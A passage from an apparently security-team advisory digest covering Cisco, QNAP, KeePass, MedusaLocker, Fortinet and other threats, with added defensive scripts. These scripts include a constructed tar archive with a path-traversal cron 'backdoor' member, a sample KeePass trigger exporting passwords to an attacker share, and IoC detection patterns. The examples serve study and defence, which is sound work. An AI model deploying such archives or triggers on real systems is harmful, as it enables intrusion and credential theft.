The first, not assigned a CVE but tracked as Cisco bug ID CSCwc67015, is an arbitrary file write in the application hosting environment. It could allow an attacker to overwrite files on the device and run their own code. The environment lets users upload applications and run them in virtual containers; Trellix researchers found, through reverse engineering, that a maliciously packed application archive can bypass the security check applied when the upload is decompressed. That check had been added to guard against CVE-2007-4559, the well-known path-traversal weakness in tar extraction. Since the issue was reported to Cisco, the company has said the fix will go live in upcoming code.
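As an added example (not Cisco or Trellix code), the Python below reproduces the class of check involved: it builds a constructed tar archive containing a path-traversal member and a symlink that escapes the destination, then shows an extraction routine that resolves every member path against the destination directory and refuses the whole archive if any member or link target would land outside it. The member names are illustrative, not taken from the Cisco report.

```python
"""Path-traversal check for archive extraction, the bug class behind
CSCwc67015 (Python's CVE-2007-4559 tarfile behaviour). Added example, not
Cisco or Trellix code; the archive below is constructed."""
import io
import os
import tarfile
import tempfile
from typing import Dict, List


def build_demo_tar(include_traversal: bool = True) -> bytes:
    """Build an in-memory tar: one benign file, plus (optionally) a member
    whose name climbs out of the destination and a symlink pointing outside."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        def add(name: str, data: bytes) -> None:
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))

        add("app/main.py", b"print('hello from the app')\n")
        if include_traversal:
            add("../../etc/cron.d/backdoor", b"* * * * * root /tmp/x\n")
            link = tarfile.TarInfo("app/escape")
            link.type = tarfile.SYMTYPE
            link.linkname = "../../../etc/passwd"
            tar.addfile(link)
    return buf.getvalue()


def unsafe_members(tar: tarfile.TarFile, dest: str) -> List[str]:
    """Names of members that would be written outside `dest`, or links whose
    target resolves outside it. realpath normalises '..' segments and any
    symlinked destination before the prefix comparison."""
    dest_real = os.path.realpath(dest)
    bad: List[str] = []
    for m in tar.getmembers():
        target = os.path.realpath(os.path.join(dest_real, m.name))
        if os.path.commonpath([dest_real, target]) != dest_real:
            bad.append(m.name)
            continue
        if m.issym():    # symlink target is relative to the member's directory
            link_target = os.path.realpath(os.path.join(os.path.dirname(target), m.linkname))
        elif m.islnk():  # hard link target is relative to the archive root
            link_target = os.path.realpath(os.path.join(dest_real, m.linkname))
        else:
            continue
        if os.path.commonpath([dest_real, link_target]) != dest_real:
            bad.append(m.name)
    return bad


def safe_extract(archive: bytes, dest: str) -> List[str]:
    """Extract only if every member passes the check; returns extracted names."""
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r") as tar:
        bad = unsafe_members(tar, dest)
        if bad:
            raise ValueError(f"refusing to extract, unsafe members: {bad}")
        tar.extractall(dest)
        return [m.name for m in tar.getmembers()]


def demo() -> Dict[str, object]:
    """Run the hostile and the clean archive through the check in a scratch dir."""
    result: Dict[str, object] = {}
    with tempfile.TemporaryDirectory() as dest:
        with tarfile.open(fileobj=io.BytesIO(build_demo_tar())) as tar:
            result["unsafe"] = unsafe_members(tar, dest)
        try:
            safe_extract(build_demo_tar(), dest)
            result["refused"] = False
        except ValueError:
            result["refused"] = True
        result["clean_extracted"] = safe_extract(build_demo_tar(include_traversal=False), dest)
    return result


if __name__ == "__main__":
    print(demo())
```

Python 3.12 ships the same idea as the filter="data" argument to extractall (also backported to maintenance releases of 3.8 through 3.11); on older interpreters a check like unsafe_members is the only protection, and the same prefix test applies to any other archive format a device accepts.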

The second, CVE-2023-20076, is more dangerous: a remote command injection vulnerability in the same application hosting component (which lets administrators deploy application containers or virtual machines directly onto the Cisco device). It stems from insufficient sanitization of the DHCP Client ID option in an application's activation parameters, which lets an attacker inject operating system commands that run as root. No workarounds are available. Both issues require the attacker to be authenticated with administrator privileges, which limits their severity, but administrator credentials are stolen often enough when they are not properly secured.

Sources

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iox-8whGn5dL – Cisco advisory for CVE-2023-20076

https://www.darkreading.com/ics-ot/command-injection-bug-cisco-industrial-gear-devices-complete-takeover

https://www.computerweekly.com/news/365530036/Cisco-fixes-two-bugs-that-could-have-led-to-supply-chain-attacks-on-users

https://www.trellix.com/en-us/about/newsroom/stories/research/when-pwning-cisco-persistence-is-key-when-pwning-supply-chain-cisco-is-key.html

Overview

QNAP Systems Inc. has warned of a new critical vulnerability, CVE-2022-27596, that allows remote attackers to inject malicious code on certain QNAP network-attached storage (NAS) devices. QNAP rates the bug with a CVSS base score of 9.8/10 and says it can be abused in low-complexity attacks.

Devices running QTS 5.0.1 or QuTS hero h5.0.1 should be upgraded immediately to QTS 5.0.1.2234 build 20221201 or later, or QuTS hero h5.0.1.2248 build 20221215 or later, respectively.

Steps to perform the update include:

  1. Log into the device as the admin user.
  2. Go to “Control Panel” > “System” > “Firmware Update.”
  3. Under the “Live Update” section, click the “Check for Update” option.
  4. Wait for the download and installation to complete.

Alternatively, QNAP device users can access and download the update from the Download Center (qnap.com/en/downloads) and enter their device details to manually apply the upgrade. It is important to update to the latest available software version as soon as possible since QNAP NAS devices have been a known target for ransomware attacks.

Sources

https://www.qnap.com/en-us/security-advisory/qsa-23-01 – QNAP Security Update

https://www.qnap.com/en/download – Download Center for QNAP

https://www.bleepingcomputer.com/news/security/qnap-fixes-critical-bug-letting-hackers-inject-malicious-code/

https://www.bleepingcomputer.com/news/security/over-29-000-qnap-devices-vulnerable-to-code-injection-attacks/ 

Overview

The open-source password manager KeePass has been linked to a newly reported vulnerability, CVE-2023-24055. Unlike most password managers, which store credentials in the cloud, KeePass keeps them in an encrypted database stored locally on the device; a master password is required to open it.

The issue allows an attacker with write access to the XML configuration file (KeePass.config.xml) to obtain cleartext passwords by adding an export trigger; it affects KeePass through 2.53 in a default installation. Once the trigger has been planted, it fires silently the next time the user opens the database: it exports the usernames, passwords, and everything else stored in the database to an unencrypted plaintext file, and the user is never notified that the export happened.

KeePass has disputed the vulnerability, arguing that anyone with write access to the device can get at the password database by other, often simpler, means, for example a keylogger that captures the master password, which for many attackers is easier than editing the XML file. The developers also stated that the user is responsible for "keeping the environment secure (by using an anti-virus software, a firewall, and not opening unknown email attachments, etc.)" and that "KeePass cannot magically run securely in an insecure environment".

Since KeePass does not plan to change this behaviour, there are a few ways to keep a KeePass deployment secure. You can create an enforced configuration file (KeePass.config.enforced.xml) following the steps in the KeePass knowledge base linked below; it must live in the same folder as KeePass.exe. Also make sure ordinary users do not have write access to that application folder or to any configuration file KeePass reads.
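As an added example (not KeePass project code), the Python script below parses a KeePass.config.xml, reports whether the trigger system is enabled and which triggers carry actions with file-path parameters (an export trigger needs a destination path), and produces an enforced configuration that switches the trigger system off. The sample config is constructed, its GUID values are placeholders rather than real KeePass event or action identifiers, and the element layout of the enforced configuration should be verified against the KeePass KB page linked above before deployment.

```python
"""Audit a KeePass.config.xml for planted triggers and emit an enforced
configuration that disables the trigger system. Added example, not KeePass
project code; verify the enforced-config layout against the KeePass KB."""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field
from typing import List

# Matches Windows drive paths, UNC paths and POSIX paths in action parameters.
PATH_LIKE = re.compile(r"^(?:[A-Za-z]:\\|\\\\|/)")


@dataclass
class TriggerFinding:
    name: str
    action_count: int
    paths: List[str] = field(default_factory=list)


def trigger_system_enabled(config_xml: str) -> bool:
    """True unless Application/TriggerSystem/Enabled is explicitly 'false'."""
    root = ET.fromstring(config_xml)
    node = root.find("Application/TriggerSystem/Enabled")
    return node is None or (node.text or "").strip().lower() != "false"


def audit_triggers(config_xml: str) -> List[TriggerFinding]:
    """List every trigger, its action count and any path-like action parameter."""
    root = ET.fromstring(config_xml)
    findings = []
    for trig in root.findall("Application/TriggerSystem/Triggers/Trigger"):
        actions = trig.findall("Actions/Action")
        paths = [
            (p.text or "").strip()
            for p in trig.findall("Actions/Action/Parameters/Parameter")
            if PATH_LIKE.match((p.text or "").strip())
        ]
        findings.append(TriggerFinding(trig.findtext("Name", ""), len(actions), paths))
    return findings


def enforced_config_disabling_triggers() -> str:
    """KeePass.config.enforced.xml content that switches the trigger system off.
    Element names mirror KeePass.config.xml; confirm against the KB page."""
    return """<?xml version="1.0" encoding="utf-8"?>
<Configuration xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Application>
    <TriggerSystem>
      <Enabled>false</Enabled>
    </TriggerSystem>
  </Application>
</Configuration>
"""


# Constructed sample config with a planted export trigger. GUID values are
# placeholders, not the real KeePass event/action identifiers.
SAMPLE_CONFIG = r"""<?xml version="1.0" encoding="utf-8"?>
<Configuration xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Application>
    <TriggerSystem>
      <Enabled>true</Enabled>
      <Triggers>
        <Trigger>
          <Guid>AAAAAAAAAAAAAAAAAAAAAA==</Guid>
          <Name>exporter</Name>
          <Events>
            <Event>
              <TypeGuid>BBBBBBBBBBBBBBBBBBBBBB==</TypeGuid>
              <Parameters><Parameter>0</Parameter></Parameters>
            </Event>
          </Events>
          <Actions>
            <Action>
              <TypeGuid>CCCCCCCCCCCCCCCCCCCCCC==</TypeGuid>
              <Parameters>
                <Parameter>KeePass XML (2.x)</Parameter>
                <Parameter>\\attacker\share\export.xml</Parameter>
              </Parameters>
            </Action>
          </Actions>
        </Trigger>
      </Triggers>
    </TriggerSystem>
  </Application>
</Configuration>
"""

if __name__ == "__main__":
    print("trigger system enabled:", trigger_system_enabled(SAMPLE_CONFIG))
    for f in audit_triggers(SAMPLE_CONFIG):
        print(f"trigger {f.name!r}: {f.action_count} action(s), paths {f.paths}")
    print(enforced_config_disabling_triggers())
```

Run the audit against KeePass.config.xml in each user's %AppData%\KeePass folder as well as the application folder; any trigger a user did not create, or whose action writes to a UNC path, deserves a closer look. The enforced file only helps if users cannot modify it, which is why it belongs in a write-protected application directory.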

Sources

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24055 – MITRE CVE-2023-24055

https://keepass.info/help/kb/config_enf.html – Enforced Configuration Steps

https://www.bleepingcomputer.com/news/security/keepass-disputes-vulnerability-allowing-stealthy-password-theft/

https://www.digitaltrends.com/computing/keepass-password-manager-exploit-no-fix/

Overview

On January 24, 2023, the Cybersecurity and Infrastructure Security Agency (CISA) released a report, "Partnering to Safeguard K-12 Organizations from Cybersecurity Threats," to help K-12 institutions protect themselves against cyber threats. Alongside the report, CISA published a toolkit of recommendations and resources for building, operating, and maintaining a safe environment for staff, students, and parents.

As technology and networks in K-12 schools have expanded, so have the malicious cyber actors and threats targeting them. Congress recognized these risks in the K-12 Cybersecurity Act of 2021 ("the Act"), which directed CISA to study and report on cyber risks to elementary and secondary schools. The resulting mandated report gives insight into current threats to K-12 schools and the steps to prevent and mitigate future attacks.

The report’s findings emphasize the importance of deploying multifactor authentication (MFA), mitigating any known vulnerabilities (patching), testing backups, and implementing a cybersecurity training program. Further down the road, this can lead to a strong cyber security plan that also correlates with the NIST Cybersecurity Framework (CSF).

CISA released a Digital Online Toolkit to provide resources and materials for K-12 schools to implement within their environment. The toolkit is available for download and includes three recommendations for building a strong cybersecurity team.

  1. Invest in the most impactful security measures and build toward a mature cybersecurity team
  2. Recognize and actively address resource constraints
  3. Focus on collaboration and information sharing


CISA's K-12 Report Emphasizes the Importance of the Following Security Practices:

  • Deploying multifactor authentication (MFA)
  • Mitigating any known vulnerabilities within the environment (patching)
  • Establishing and testing backups regularly
  • Developing an incident response plan and exercising it periodically
  • Creating a strong cybersecurity training program
  • Prioritizing investments in alignment with the full list of CISA's Cross-Sector Cybersecurity Performance Goals (CPGs)
  • Developing a unique cybersecurity plan that leverages the NIST CSF

CISA states that these steps will quickly reduce the malicious cyber threats and vulnerabilities that affect the educational environment.



CISA also emphasizes that a strong partnership between K-12 organizations, FBI regional cybersecurity personnel, and CISA itself will be a valuable resource for future developments on this topic.

Sources

https://www.congress.gov/bill/117th-congress/senate-bill/1917 – “The Act”
https://www.cisa.gov/sites/default/files/publications/K-12report-24Jan23.pdf – Report PDF
https://www.cisa.gov/partnering-safeguard-k-12-toolkit – The Online Toolkit (download)
https://www.cisa.gov/protecting-our-future-partnering-safeguard-k-12-organizations-cybersecurity-threats – Partnership Announcement

Overview

On January 23, 2023, Apple released security updates addressing vulnerabilities in several of its products. Any unpatched device running affected software is at risk of an attacker gaining access.

The updates are Safari 16.3, iOS 12.5.7, iOS 15.7.3 and iPadOS 15.7.3, iOS 16.3 and iPadOS 16.3, macOS Monterey 12.6.3, macOS Big Sur 11.7.3, macOS Ventura 13.2, and watchOS 9.3. Installing the applicable January 23 update mitigates the vulnerabilities on each of these platforms.

Sources

https://www.cisa.gov/uscert/ncas/current-activity/2023/01/24/apple-releases-security-updates-multiple-products

https://support.apple.com/en-us/HT201222

Overview

MedusaLocker has adopted new tactics, targeting unpatched VPN appliances for initial access. Once inside, the operators create a scheduled task named "svhost" to run the encryptor on machines and inject into system processes such as spoolsv.exe and svchost.exe. Command-and-control traffic has been observed on ports 80, 445, and 2222. MedusaLocker operators have also been seen abusing TeleLinkSoftHelper's Employee Monitoring software and staging tooling such as Nmap, Mimikatz, Netscan, and Netpass in users' Pictures and Videos folders.

Indicators of Compromise (IoCs) include the IP addresses 64.190.63[.]111 and 194.165.17[.]15.

Mitigations for MedusaLocker include:

  • Ensure all VPN appliances are fully patched.
  • Block the IoC IPs above at the firewall.
  • Implement least privilege for local and domain users, and audit current users to confirm admin rights have not been granted where they are not required.
  • Block the file names listed in the threat notice in your antivirus (AV)/EDR solution.
  • Require MFA for users connecting through the VPN.
  • Audit and remove legacy or unneeded accounts that have VPN access.

(Blackpoint Cyber Threat Notice, personal communication, January 23, 2023)
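As an added example (not Blackpoint's detection content), the script below runs the indicators from this note over constructed firewall and endpoint log lines in a simple key=value format. It flags traffic to the two listed IPs, outbound connections on port 2222 (80 and 445 are only flagged when the destination is a listed IP, since on their own they are far too common), creation of a scheduled task named svhost, and the named tools, with a separate marker when a tool runs from a Pictures or Videos folder. The log format, hostnames and internal addresses are assumptions.

```python
"""Run the MedusaLocker indicators from this note over log lines. Added
example, not Blackpoint's content; log format and hosts are constructed."""
import re
from typing import Dict, List

IOC_IPS = {"64.190.63.111", "194.165.17.15"}
IOC_PORTS = {80, 445, 2222}   # C2 ports; 80 and 445 only count together with an IoC IP
UNUSUAL_PORTS = {2222}        # rare enough outbound to flag on its own
IOC_TASK = "svhost"
IOC_TOOLS = ("nmap", "mimikatz", "netscan", "netpass")
STAGING_DIRS = ("\\pictures\\", "\\videos\\")

DST_RE = re.compile(r"\bdst=(\d{1,3}(?:\.\d{1,3}){3})")
DPORT_RE = re.compile(r"\bdport=(\d+)")
TASK_RE = re.compile(r"\btaskname=\\?(\S+)", re.IGNORECASE)
IMAGE_RE = re.compile(r"\bimage=(.+)$")


def scan_line(line: str) -> List[str]:
    """Return the indicator matches for one log line (empty list if clean)."""
    reasons: List[str] = []
    m = DST_RE.search(line)
    dst = m.group(1) if m else None
    if dst in IOC_IPS:
        reasons.append(f"c2_ip:{dst}")
    m = DPORT_RE.search(line)
    if m:
        port = int(m.group(1))
        if port in UNUSUAL_PORTS or (dst in IOC_IPS and port in IOC_PORTS):
            reasons.append(f"c2_port:{port}")
    m = TASK_RE.search(line)
    if m and m.group(1).lower() == IOC_TASK:
        reasons.append(f"task:{IOC_TASK}")
    m = IMAGE_RE.search(line)
    if m:
        image = m.group(1).strip().lower()
        exe = image.rsplit("\\", 1)[-1]
        for tool in IOC_TOOLS:
            if exe.startswith(tool):
                staged = any(d in image for d in STAGING_DIRS)
                reasons.append(f"{'staged_tool' if staged else 'tool'}:{tool}")
                break
    return reasons


def scan(lines: List[str]) -> Dict[int, List[str]]:
    """Map line index to its indicator matches, skipping clean lines."""
    hits: Dict[int, List[str]] = {}
    for i, line in enumerate(lines):
        reasons = scan_line(line)
        if reasons:
            hits[i] = reasons
    return hits


# Constructed sample lines: a generic key=value firewall format and an
# endpoint (task scheduler / process creation) format. Not real telemetry.
SAMPLE_LOGS = [
    r"2023-01-23T10: 02:11Z fw action=allow src=10.0.5.12 dst=64.190.63.111 dport=2222 proto=tcp".replace(": 0", ":0"),
    r"2023-01-23T10:02:15Z fw action=allow src=10.0.5.12 dst=93.184.216.34 dport=443 proto=tcp",
    r"2023-01-23T10:05:40Z host=WS-17 event=TaskCreated taskname=\svhost author=CORP\jdoe",
    r"2023-01-23T10:06:02Z host=WS-17 event=ProcessCreate image=C:\Users\jdoe\Pictures\netscan.exe",
    r"2023-01-23T10:07:12Z fw action=allow src=10.0.5.12 dst=194.165.17.15 dport=445 proto=tcp",
    r"2023-01-23T10:07:30Z host=ADM-01 event=ProcessCreate image=C:\Program Files\Nmap\nmap.exe",
]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_LOGS).items():
        print(f"line {idx}: {', '.join(reasons)}  <- {SAMPLE_LOGS[idx]}")
```

The last sample line shows why the staging-directory distinction matters: Nmap under Program Files on an admin workstation is worth a look but is often legitimate, whereas a scanner launched from a user's Pictures folder matches the staging behaviour the note describes and should be escalated.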

Sources

https://www.cisa.gov/uscert/ncas/alerts/aa22-181a

 

Overview

Newly disclosed vulnerabilities in Zoho ManageEngine products, tracked as CVE-2022-47966, allow unauthenticated remote code execution (RCE). The root cause is an outdated version of the Apache Santuario XML security library bundled with the products. Affected products are at risk if SAML-based single sign-on is enabled or has been enabled at some point. To mitigate, patch every affected product to the latest version listed in Zoho ManageEngine's security advisory below.

Sources

https://www.manageengine.com/security/advisory/CVE/cve-2022-47966.html – ManageEngine Security Advisory

https://nvd.nist.gov/vuln/detail/CVE-2022-47966 – NIST CVE-2022-47966

https://www.csoonline.com/article/3685940/attackers-exploiting-critical-flaw-in-many-zoho-manageengine-products.html

Overview

The National Institute of Standards and Technology (NIST) has released the “Cybersecurity Framework 2.0 Concept Paper: Potential Significant Updates to the Cybersecurity Framework,” outlining considered changes to the Cybersecurity Framework (CSF).

The CSF is meant to be a living document that is developed over time. Its purpose is to guide organizations to better understand, manage, reduce, and communicate cybersecurity risks. The evolving nature of the CSF is upheld to keep pace with changing technology and threat trends, adopt lessons learned, and shift common practices to best practices. In turn, the Framework can continue to help organizations effectively manage risk in the ever-changing cybersecurity landscape.

While the framework is a voluntary guide, it is widely used by all sectors around the globe.

The development of the CSF is based heavily on private and public sector input. As such, NIST welcomes public responses to the concept paper to improve the Framework’s effectiveness and better align it with other cybersecurity resources. The organization asks the community to provide feedback by March 3, 2023.

Public involvement has already played a significant role in the process. According to NIST, the concept paper was based on feedback received so far through:

  • Responses to the February 2022 NIST Cybersecurity Request for Information (RFI);
  • A workshop held in August of 2022 attended by nearly 4,000 participants from 100 countries;
  • Feedback received from organizations who’ve used the CSF; and
  • NIST participation at events and meetings around the world.



One notable change proposed in the paper is to expand the Framework’s scope to be more inclusive to organizations beyond critical infrastructure. This means more guidance for organizations like small businesses and educational institutions.

Throughout the process, NIST will continue to pursue stakeholder feedback through publicly held webinars and workshops.

The original CSF 2.0 timeline documented in the concept paper indicates NIST’s goal to have CSF 2.0 ready in the winter of 2024.

Sources

https://www.nist.gov/cyberframework/updating-nist-cybersecurity-framework-journey-csf-20

https://fedscoop.com/nist-working-on-potential-significant-updates-to-cybersecurity-framework/

https://www.nist.gov/system/files/documents/2023/01/19/CSF_2.0_Concept_Paper_01-18-23.pdf

https://www.federalregister.gov/documents/2022/02/22/2022-03642/evaluating-and-improving-nist-cybersecurity-resources-the-cybersecurity-framework-and-cybersecurity

Overview

Rhadamanthys Stealer is being distributed through a malvertising campaign: Google Ads redirect users to trojanized installers for popular software (examples from the alert: Zoom, AnyDesk, BlueStacks, Notepad++, and Adobe Acrobat). It is an information stealer built to collect targeted files, system information, browser cookies, history, autofill data and saved passwords, 2FA and password-manager data, VPN and mail-client credentials, and more. The malware encrypts its command-and-control traffic with AES-256. Indicators of Compromise (IoCs) are available in the sources below.

 

Sources

https://socprime.com/blog/rhadamanthys-malware-detection-new-infostealer-spread-via-google-ads-spam-emails-to-target-crypto-wallets-and-dump-sensitive-information/

https://www.pcrisk.com/removal-guides/25643-rhadamanthys-stealer

https://threatmon.io/rhadamanthys-stealer-analysis-threatmon

Overview

Fortinet published critical advisory FG-IR-22-398 (CVE-2022-42475), a heap-based buffer overflow in the FortiOS SSL-VPN daemon (sslvpnd), on December 12, 2022, and has updated it since. On January 11, 2023, the company issued a write-up detailing its initial investigation into the malware deployed through the flaw and additional IoCs found during its ongoing analysis. The vulnerability has been exploited in the wild and now carries a CVSS score of 9.8, which is critical.

Reports indicate attackers have used the exploit against large organizations and government agencies; SMBs should fix the flaw now, before the same attackers turn their sights on smaller organizations. The complexity of the exploit indicates an advanced, possibly state-sponsored, capability. Patches are available through FortiGuard (fortiguard.com).

Affected versions:

  • FortiOS 7.2.0 through 7.2.2
  • FortiOS 7.0.0 through 7.0.8
  • FortiOS 6.4.0 through 6.4.10
  • FortiOS 6.2.0 through 6.2.11
  • FortiOS-6K7K 7.0.0 through 7.0.7
  • FortiOS-6K7K 6.4.0 through 6.4.9
  • FortiOS-6K7K 6.2.0 through 6.2.11
  • FortiOS-6K7K 6.0.0 through 6.0.14

Fixed versions: FortiOS 7.2.3, 7.0.9, 6.4.11 and 6.2.12 or above; FortiOS-6K7K 7.0.8, 6.4.10, 6.2.12 and 6.0.15 or above.
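As an added example (not Fortinet tooling), the script below transcribes the affected ranges quoted in this section and in the FortiWeb and FortiNAC section earlier on this page into a lookup table, and reports which hosts in an inventory are still on an affected build. The inventory rows and hostnames are constructed; the product names are the ones the advisories use, and a product missing from the table is reported as unknown rather than safe.

```python
"""Flag Fortinet hosts still running versions listed as affected in the
advisories quoted on this page. Added example, not Fortinet tooling."""
import re
from typing import Dict, List, Optional, Tuple

Version = Tuple[int, ...]
Range = Tuple[Version, Version]

# Inclusive (low, high) ranges transcribed from the advisories above.
# A whole release train ("6.4, all versions") gets a 999 sentinel as its
# upper bound so that any 6.4.x compares inside the range.
AFFECTED: Dict[str, List[Range]] = {
    # FG-IR-22-398 / CVE-2022-42475
    "FortiOS": [((7, 2, 0), (7, 2, 2)), ((7, 0, 0), (7, 0, 8)),
                ((6, 4, 0), (6, 4, 10)), ((6, 2, 0), (6, 2, 11))],
    "FortiOS-6K7K": [((7, 0, 0), (7, 0, 7)), ((6, 4, 0), (6, 4, 9)),
                     ((6, 2, 0), (6, 2, 11)), ((6, 0, 0), (6, 0, 14))],
    # FG-IR-21-186 / CVE-2021-42756
    "FortiWeb": [((5,), (5, 999)), ((6, 0, 0), (6, 0, 7)),
                 ((6, 1, 0), (6, 1, 2)), ((6, 2, 0), (6, 2, 6)),
                 ((6, 3, 0), (6, 3, 16)), ((6, 4), (6, 4, 999))],
    # FG-IR-22-300 / CVE-2022-39952
    "FortiNAC": [((9, 4, 0), (9, 4, 0)), ((9, 2, 0), (9, 2, 5)),
                 ((9, 1, 0), (9, 1, 7)), ((8, 8), (8, 8, 999)),
                 ((8, 6), (8, 6, 999)), ((8, 5), (8, 5, 999)),
                 ((8, 3), (8, 3, 999))],
}


def parse_version(text: str) -> Version:
    """Extract the first dotted number from strings such as 'v7.0.8',
    '6.3.16' or 'FortiWeb-6.4.1 build0123' into a comparable tuple."""
    m = re.search(r"\d+(?:\.\d+)*", text)
    if not m:
        raise ValueError(f"no version number in {text!r}")
    return tuple(int(p) for p in m.group(0).split("."))


def is_affected(product: str, version: str) -> Optional[bool]:
    """True if the version sits in an affected range, False if it does not,
    None if the product is not in the table (unknown is not the same as safe)."""
    ranges = AFFECTED.get(product)
    if ranges is None:
        return None
    v = parse_version(version)
    return any(low <= v <= high for low, high in ranges)


def triage(inventory: List[Tuple[str, str, str]]) -> List[Tuple[str, str]]:
    """Rows are (hostname, product, version); returns (hostname, verdict)."""
    report = []
    for host, product, version in inventory:
        hit = is_affected(product, version)
        verdict = {True: "PATCH", False: "ok", None: "unknown product"}[hit]
        report.append((host, verdict))
    return report


# Constructed inventory for demonstration; hostnames are made up.
DEMO_INVENTORY = [
    ("fw-edge-1", "FortiOS", "v7.0.8"),
    ("fw-edge-2", "FortiOS", "v7.0.9"),
    ("waf-1", "FortiWeb", "5.9.1"),
    ("nac-1", "FortiNAC", "8.8.12"),
    ("nac-2", "FortiNAC", "9.4.1"),
    ("fgt-lab", "FortiGate", "7.0.0"),
]

if __name__ == "__main__":
    for host, verdict in triage(DEMO_INVENTORY):
        print(f"{host:10} {verdict}")
```

Feed it the version strings from your inventory or from get system status on each device; the table is the only part that changes when Fortinet publishes the next advisory.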

Sources

https://www.fortinet.com/blog/psirt-blogs/analysis-of-fg-ir-22-398-fortios-heap-based-buffer-overflow-in-sslvpnd

https://nvd.nist.gov/vuln/detail/CVE-2022-42475

https://vulcan.io/blog/how-to-fix-cve-2022-42475/

Overview

On January 11, 2023, Cisco published an advisory for multiple vulnerabilities in the web-based management interface of several of its small-business RV Series routers, tracked as CVE-2023-20025, CVE-2023-20026, and CVE-2023-20045. The most severe, an authentication bypass, carries a CVSS score of 9.0. The affected models are:

  • RV016 Multi-WAN VPN Routers
  • RV042 Dual WAN VPN Routers
  • RV042G Dual Gigabit WAN VPN Routers
  • RV082 Dual WAN VPN Routers

According to Cisco, a successful exploit could allow an attacker to bypass authentication and gain root access to the underlying operating system. Cisco has not released software updates for these vulnerabilities and has stated that it does not intend to, and it lists no workarounds, so security teams should monitor these devices closely. Although not an official Cisco workaround, disabling remote management and blocking access to ports 443 and 60443 prevents exploitation through the web interface. Cisco ended support for the RV082 and RV016 in 2021 and software maintenance for the RV042 and RV042G the same year, although hardware support for those two runs until 2025.

Sources

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sbr042-multi-vuln-ej76Pke5

https://siliconangle.com/2023/01/11/cisco-warns-customers-critical-vulnerabilities-small-business-routers/

https://www.theregister.com/AMP/2023/01/13/cisco_smb_critical_router_flaw_no_fix/

Overview

Flipper Zero is a portable multi-function pen-testing device that came out in 2020. It combines hardware radios with custom, open-source software for interacting with and intercepting many short-range wireless signals: it can read and emulate RFID access cards and NFC cards, capture and replay sub-GHz radio such as keyless entry systems and garage door openers, and talk to Internet of Things (IoT) sensors and other nearby wireless devices. The tool is used by security professionals, hobbyists and criminals alike, and its popularity has itself been turned into a lure: phishing campaigns impersonating Flipper Zero storefronts have targeted the infosec community.

Sources

https://docs.flipperzero.one/

https://www.zdnet.com/article/flipper-zero-geeky-toy-or-serious-security-tool/

https://www.bleepingcomputer.com/news/security/ongoing-flipper-zero-phishing-attacks-target-infosec-community/

https://www.infosecurity-magazine.com/news/phishing-campaign-uses-flipper-zero/

https://www.wired.com/story/what-is-flipper-zero-tiktok/

Overview

Bleeping Computer and other outlets reported that a previously unknown Linux malware is exploiting vulnerabilities in numerous outdated WordPress plugins and themes to inject malicious JavaScript into sites. According to antivirus vendor Dr.Web, the malware targets 32-bit and 64-bit Linux systems and gives its operator remote command capabilities. The trojan carries a set of hard-coded exploits that it tries in turn until one succeeds. To defend against this threat, WordPress administrators should update every plugin and theme on their sites to the latest available version and replace any that are no longer developed or supported with reputable alternatives.


Sources

https://linuxsecurity.com/news/hackscracks/new-linux-malware-uses-30-plugin-exploits-to-backdoor-wordpress-sites#:~:text=A%20previously%20unknown%20Linux%20malware,its%20operator%20remote%20command%20capabilities

https://www.bleepingcomputer.com/news/security/new-linux-malware-uses-30-plugin-exploits-to-backdoor-wordpress-sites/ 

Overview

In September of 2022, GTSC reported a critical infrastructure attack that took place in August of 2022. The investigation revealed that the threat actor used two zero-day vulnerabilities in Microsoft Exchange Server in the attack. The vulnerabilities were later identified as CVE-2022-41040 and CVE-2022-41082. The exploitation of these two vulnerabilities was used to create a backdoor on a vulnerable server and perform lateral movement.

The discovery of CVE-2022-41040 and CVE-2022-41082, dubbed by the cybersecurity community as ProxyNotShell, led Microsoft to release two patches to cover the vulnerabilities.

Blackpoint Cyber notified its partners that it is actively monitoring the CVE-2022-41080 and CVE-2022-41082 vulnerabilities, which are exploited in tandem to bypass the earlier Microsoft Exchange ProxyNotShell (CVE-2022-41040) mitigations and allow access to unauthorized internal resources. Previously, the mitigation step issued by GTSC was a temporary containment measure. However, this new attack chain can be used to bypass the recommended URL request blocking mitigations, making it critical to ensure that servers are patched rather than relying on the workaround.

To mitigate this risk, organizations are advised to patch systems using Microsoft’s November 2022 patch releases, which cover all three vulnerabilities.

Sources

Overview

LastPass updated its security incident notice to provide new details about the data breach it has been investigating since November of 2022. The update revealed that the threat actor targeted an employee using information obtained from a data breach that occurred in August of 2022. Using credentials and keys obtained from the employee, the threat actor decrypted storage volumes within LastPass’s cloud-based storage service. The storage volumes contained basic customer account information and related metadata. While the threat actor was able to copy a backup of customer vault data containing both encrypted and unencrypted data, the encrypted data can only be decrypted with a unique encryption key derived from a user’s master password. It is believed to be extremely unlikely that the threat actor will successfully crack the master password due to computational limitations, provided users followed the password requirements recommended by LastPass.

In response to the LastPass update, Arctic Wolf issued the following recommendations:

Recommendation #1: Delete Existing SAML Integration

If you received an email from LastPass stating that your organization leverages an impacted API-based integration, we strongly recommend following LastPass’ recommendation to delete existing SAML integrations. To view your existing SAML integrations and delete them, follow this support guide provided by LastPass: https://support.lastpass.com/help/how-do-i-delete-an-existing-saml-integration

Recommendation #2: Provide User Awareness Training

Provide tailored user awareness training to all employees around the LastPass data breach. Ensure users know how to identify a phishing email and where to report it. Furthermore, provide examples of what users could expect and remind users to remain vigilant when receiving an email from an unknown or external source.

Recommendation #3: Consider Resetting Master Password

If a user’s master password is reused or does not meet the minimum password requirements provided by LastPass, reset the user’s master password to prevent potential future impacts if the master password is brute-forced or leaked in a credential list.


Sources

Overview

